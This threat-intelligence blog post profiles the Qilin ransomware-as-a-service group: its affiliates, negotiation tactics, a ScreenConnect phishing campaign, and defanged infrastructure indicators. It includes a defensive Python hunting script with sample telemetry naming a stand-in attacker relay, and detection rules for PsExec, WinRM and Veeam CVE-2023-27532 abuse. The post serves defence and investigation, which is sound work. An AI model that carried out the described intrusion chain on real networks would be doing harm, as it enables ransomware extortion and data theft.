The Evolution of Qilin RaaS

Qilin represents one of the most dangerous and adaptive RaaS threats active today.

Authored by Will Thomas

The authors of FOR589 discuss the evolution of one of the most active cybercriminal threats, known as Qilin, a ransomware-as-a-service (RaaS) operation originating from the Russian-speaking underground community.

In this blog, we will discuss the evolution of Qilin, a well-known RaaS platform that has been linked to several high-profile ransomware attacks, including against Synnovis, The Big Issue, Yanfen, and Inotiv.

  • Qilin RaaS has emerged as one of the leading platforms following the takedown of LockBit, the exit scam by ALPHV/BlackCat, and the shutdown of RansomHub.
  • The ransomware is used for “big game hunting” style attacks, which involve encrypting enterprise networks and demanding ransoms in the millions of dollars.
  • Defenders and investigators can expect to see more Qilin victims appear in the short term. However, as the group gains notoriety, it attracts the attention of more law enforcement agencies, which have successfully shut down multiple RaaS groups in recent years.

Summary of the Qilin RaaS Up to Mid-2025

Active since at least mid-2022, the Qilin group is named after a mythical Chinese creature. The cybercriminals behind the Qilin RaaS, however, speak Russian. Before the Qilin RaaS emerged, the threat actors used the name Agenda ransomware, later changing to Qilin.

Qilin ransomware is used for domain-wide encryption, and a ransom is then demanded for the decryption keys and/or to prevent the publication of the stolen data. Qilin affiliates are recruited from cybercrime forums to use the Qilin RaaS platform, which handles payload generation, the publication of stolen data, and ransom negotiations.

Qilin is advertised on the exclusive Russian-speaking forum RAMP (short for Ransom Anon Market Place [sic]), where acquiring an account can cost up to $500 in BTC. The forum profile “Haise” joined RAMP on May 29, 2022, and advertised Qilin on February 13, 2023.

On May 1, 2024, Qilin made an unusual move by adding a new QR code to its Tor data leak site, which pointed to a site called WikiLeaksV2, hosted on the clearnet (a capture is available on URLscan), where they listed a selection of their victims in addition to soliciting cryptocurrency donations. They also claimed, in a pseudo-interview with themselves, to be politically motivated.

RansomwareLive is a useful source for investigating ransomware groups. One of the most valuable sources of data is the negotiation chats between ransomware gangs and their victims. The website contains a detailed negotiation chat between a Qilin negotiator and a victim, providing insight into how the group operates.

To entice victims to pay the ransom, the Qilin negotiator offered several services, including a decryption tool, a list of stolen files, proof that the data was deleted, an explanation of how they infiltrated the victim’s network, security recommendations, and a promise not to attack the victim again. Qilin also allowed victims to decrypt up to three files as proof they had decryption capability.

This negotiation chat began on February 3, 2025, and concluded on February 26, 2025, with no ransom being paid. During the chat, Qilin mentioned having stolen patient data, and on February 26, a medical company in Canada matching this description was listed on Qilin’s data leak site.

Qilin RaaS Affiliate System

In short, a ransomware affiliate is essentially a partner in a RaaS operation. These are external cybercriminals (individuals or groups) who “rent” or are invited to access the RaaS through an affiliate program. Affiliates keep a cut of ransom payments, while the operators take a smaller percentage in exchange for providing the ransomware payloads, Tor infrastructure, and negotiation portal.

In March 2023, Group-IB researchers noted that Qilin affiliates using the RaaS received up to 80% if the ransom paid was $3 million USD or less. For ransoms over $3 million USD, an affiliate's cut could rise to 85%. In July 2023, KELA spotted that the Qilin RaaS operator Haise stated on RAMP that ransom payments are paid to their affiliates’ cryptocurrency wallets first and only then is a share transferred to the Qilin RaaS operators.

As of July 2025, however, security researcher Arda Büyükkaya (@WhichbufferArda) identified multiple forum posts criticising the Qilin RaaS. One affiliate, “hastalamuerte,” claimed they lost $48,000 USD (in Bitcoin) after a ransom negotiation “mysteriously disappeared” from a Tox chat. In the same thread, another actor, “Nova,” posted credentials and a screenshot of Qilin’s affiliate panel to embarrass the group. It appears that not all affiliates of Qilin are satisfied, and some are even attempting to sabotage it.

Notable Affiliates of Qilin RaaS

In June 2022, Microsoft reported that DEV-0237 (also known as FIN12) was identified as an affiliate of Agenda ransomware, the precursor to Qilin. FIN12 was also an affiliate of Nokoyawa, ALPHV/BlackCat, Hive, Conti, and Ryuk ransomware according to Microsoft.

On April 30, 2023, Qilin published Siix Corporation to its Tor data leak site. On October 17, 2023, ALPHV/BlackCat also published Siix Corporation to its Tor site. On October 26, 2023, SG World appeared on the Qilin Tor data leak site, having previously been listed on the Conti Tor data leak site on April 17, 2021. Overlapping victim listings like these are one indicator of affiliates who move between RaaS programs, or who re-extort a victim whose earlier access was never fully remediated.

In July 2024, Microsoft shared that Octo Tempest (also known as SCATTERED SPIDER), a group known for social engineering techniques such as vishing IT helpdesk personnel into resetting passwords and for targeting VMware ESXi servers with ransomware, had become a Qilin affiliate.

In March 2025, Microsoft identified Moonstone Sleet, a North Korean state actor, deploying Qilin ransomware at a limited number of organizations.

In April 2025, a Qilin affiliate self-identified as “Devman” when they included “Pwn3d By Qilin & Devman” in one of their victim posts. The affiliate also revealed the ransom demand of $60,000 USD and included an onion link to “DEVMANS_BLOG,” a different Tor data leak site.

The Qilin Network

In March 2025, a new extortion group appeared called Arkana Security. Arkana launched a new data leak site and claimed to have stolen over 2 million customer records from WideOpenWest (WOW!), a major US internet service provider. Later, on Arkana’s Tor data leak site, the “About & Contact” page displayed a Qilin Network logo, suggesting an affiliation between the two groups.

Qilin’s Legal Department

In June 2025, Qilin’s administrator, Haise, posted to RAMP announcing plans to add a “call lawyer” legal assistance feature to the RaaS panel. This pseudo-legal service was framed as legal advice to help affiliates manage extortion negotiations and increase pressure on victims, reflecting the maturing of the RaaS ecosystem.

By performing legal assessments to classify stolen data, the extortionists aimed to emphasize compliance risks and regulatory exposure under frameworks such as GDPR, CCPA, and HIPAA as well as applicable laws by jurisdiction.

Qilin’s goal is to push victims to pay by convincing them that lawsuits and reputational damage would be costlier than the ransom.

Fake Europol Poster for Qilin Admins

In July 2025, a Telegram channel called “@EuropolRewards” appeared, claiming to be Europol. It offered rewards of up to $50,000 for information leading to the arrest of Qilin administrators “Haise” and “XORacle.” Europol later confirmed to SecurityWeek that this Telegram channel was a scam and not affiliated with the law enforcement agency.

It remains unclear who was behind this campaign. One theory is that Qilin itself launched it to find out what investigators already knew about their identities so that they can improve their operational security (OPSEC). Another is that rival cybercriminals wanted to expose Qilin admins, potentially to hand the information to law enforcement in the hopes that they are arrested or sanctioned.

Qilin Supply Chain Attack

In late January 2025, Qilin affiliates (tracked by Sophos as STAC4365) launched a cleverly crafted phishing email campaign posing as authentication alerts for a Managed Service Provider’s ScreenConnect RMM tool.

Victims who clicked the link were redirected to a malicious phishing site that captured both login credentials and MFA one-time passwords (OTPs), the classic adversary-in-the-middle pattern that defeats OTP-based MFA, granting the attackers super-admin access to the MSP's environment.

Once inside, the attackers:

  • Deployed their own ScreenConnect instances across multiple customer networks.
  • Used PsExec and WinRM for reconnaissance and lateral movement.
  • Exploited CVE-2023-27532 in Veeam Backup & Replication to recover stored backup credentials.
  • Disabled backups, exfiltrated data, and deployed Qilin ransomware.
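Each of the four post-compromise steps above leaves a distinct trace on the endpoint. The following hunting script is an added example (not code from Sophos or from the original post) that runs simple rules over a constructed set of normalized Windows events: a service-install event (EID 7045) whose ScreenConnect client points at a relay outside the MSP's sanctioned instance, a PSEXESVC service install, WinRM (TCP 5985/5986) connections from hosts that are not designated admin hosts, and connections to TCP 9401, the Veeam Backup Service port exposed by CVE-2023-27532, from hosts that are not the backup server or its consoles. The event field names, the allowlists, hostnames and the relay domains are all assumptions chosen for the example, and the ScreenConnect `h=` relay parameter is parsed from the service ImagePath as a convention rather than guaranteed by any vendor documentation.

```python
"""Hunt for the Qilin/STAC4365 post-compromise chain in constructed event data.

Added example for this post; the telemetry below is made up for illustration.
"""
import re
from dataclasses import dataclass

# Defender-supplied allowlists (hypothetical values for this example).
ALLOWED_SC_RELAYS = {"msp-sanctioned.screenconnect.com"}  # the MSP's real relay host
ADMIN_HOSTS = {"jump01"}                                  # hosts permitted to use WinRM
BACKUP_CONSOLES = {"veeam-srv", "jump01"}                 # hosts permitted to reach the Veeam Backup Service

# ScreenConnect clients carry their relay host as an "h=" parameter in the service ImagePath.
SC_RELAY_RE = re.compile(r"[?&]h=([A-Za-z0-9.\-]+)")


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def check_service_install(ev):
    """EID 7045 (System log): a new service was installed on ev['host']."""
    name = ev.get("ServiceName", "")
    path = ev.get("ImagePath", "")
    if name.startswith("ScreenConnect Client"):
        m = SC_RELAY_RE.search(path)
        relay = m.group(1) if m else "<unknown>"
        if relay not in ALLOWED_SC_RELAYS:
            return Finding("rogue_screenconnect", ev["host"], f"relay={relay} service={name!r}")
    if name.upper() == "PSEXESVC" or path.upper().endswith("PSEXESVC.EXE"):
        return Finding("psexec_service", ev["host"], f"path={path}")
    return None


def check_network(ev):
    """Sysmon EID 3: outbound connection from ev['host'] to DestinationIp:DestinationPort."""
    port = int(ev.get("DestinationPort", 0))
    src = ev["host"]
    if port in (5985, 5986) and src not in ADMIN_HOSTS:
        return Finding("winrm_from_nonadmin", src, f"-> {ev['DestinationIp']}:{port}")
    if port == 9401 and src not in BACKUP_CONSOLES:
        return Finding("veeam_backup_service_9401", src, f"-> {ev['DestinationIp']}:{port}")
    return None


def hunt(events):
    """Return one Finding per event that matches a rule, in input order."""
    findings = []
    for ev in events:
        f = None
        if ev["EventID"] == 7045:
            f = check_service_install(ev)
        elif ev["EventID"] == 3:
            f = check_network(ev)
        if f:
            findings.append(f)
    return findings


# Constructed sample telemetry: one benign and one rogue ScreenConnect install,
# a PsExec service, WinRM from an admin host and from a workstation, and two
# connections to the Veeam Backup Service port.
SAMPLE_EVENTS = [
    {"EventID": 7045, "host": "ws-042",
     "ServiceName": "ScreenConnect Client (a1b2c3d4e5f67890)",
     "ImagePath": r'"C:\Program Files (x86)\ScreenConnect Client (a1b2c3d4e5f67890)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=msp-sanctioned.screenconnect.com&p=8041"'},
    {"EventID": 7045, "host": "ws-042",
     "ServiceName": "ScreenConnect Client (ffeeddccbbaa9988)",
     "ImagePath": r'"C:\Program Files (x86)\ScreenConnect Client (ffeeddccbbaa9988)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.attacker.example&p=8041"'},
    {"EventID": 7045, "host": "fs-01", "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 3, "host": "jump01", "DestinationIp": "10.0.0.20", "DestinationPort": 5985},
    {"EventID": 3, "host": "ws-042", "DestinationIp": "10.0.0.20", "DestinationPort": 5985},
    {"EventID": 3, "host": "ws-042", "DestinationIp": "10.0.0.50", "DestinationPort": 9401},
    {"EventID": 3, "host": "veeam-srv", "DestinationIp": "10.0.0.50", "DestinationPort": 9401},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Run against the sample data the script reports four findings: the second ScreenConnect install (relay outside the allowlist), the PSEXESVC service on the file server, and the WinRM and port 9401 connections originating from the workstation; the admin jump host and the backup server produce nothing. The rules are deliberately allowlist-based because the attacker in this campaign abused a legitimate RMM tool, so "is ScreenConnect present" is useless as a signal and "which instance is it enrolled in" is the question that matters.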

Outlook

Qilin RaaS is unusual and interesting for several reasons. Its affiliates range from state-sponsored North Korean threat actors to members of SCATTERED SPIDER, as well as Devman and Arkana. Healthcare remains a key target, consistent with FIN12’s past focus on hospitals.

Qilin has been absorbing affiliates from disrupted groups like LockBit and ALPHV/BlackCat. There are also signs, in the affiliate complaints described above, that its infrastructure is struggling to keep up with the volume of attacks conducted by its users. Its administrators are innovating as well, expanding through the Qilin Network and introducing legal intimidation tactics via the “call lawyer” feature.

As a result, Qilin represents one of the most dangerous and adaptive RaaS threats active today.

Recommended Best Practices

  • Maintain and test backups.
  • Ensure data loss prevention (DLP) systems are configured properly.
  • Develop and rehearse incident response plans through tabletop exercises (TTXs).
  • Prepare for scenarios where threat actors attempt to highlight the legal implications of breaches.

Additional Resources

Qilin Infrastructure

Qilin Data Leak Site:

  • ozsxj4hwxub7gio347ac7tyqqozvfioty37skqilzo2oqfs4cw2mgtyd[.]onion
  • kbsqoivihgdmwczmxkbovk7ss2dcynitwhhfu5yw725dboqo5kthfaad[.]onion
  • ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd[.]onion

Qilin Victim Portal:

  • ozsxj4hwxub7gio347ac7tyqqozvfioty37skqilzo2oqfs4cw2mgtyd[.]onion

Qilin Affiliate Portal:

  • ji57fr53anp7wb44tbbnp72qcgbhqywy4jmbncawdcrejj5amuvh3zqd[.]onion

Qilin Clearnet Site:

  • wikileaksv2[.]com (31.41.244[.]100)

How SANS FOR589: Cybercrime Investigations Can Help

Mitigating ransomware attacks requires regular reviews of detection systems and system resiliency. Cybercriminals like Qilin affiliates will continue to rely on similar tactics, techniques, and procedures (TTPs).

In the SANS FOR589 class, students learn to:

  • Access and monitor cybercriminal forums where initial access brokers and RaaS platforms are active.
  • Track emerging threats, document TTPs, and build a dossier on cybercriminals.
  • Identify opportunities for interdiction.

Sign up for a FOR589 sample on SANS.org or register for FOR589: Cybercrime Investigations now to develop actionable intelligence skills to defend against the most notorious cybercriminals.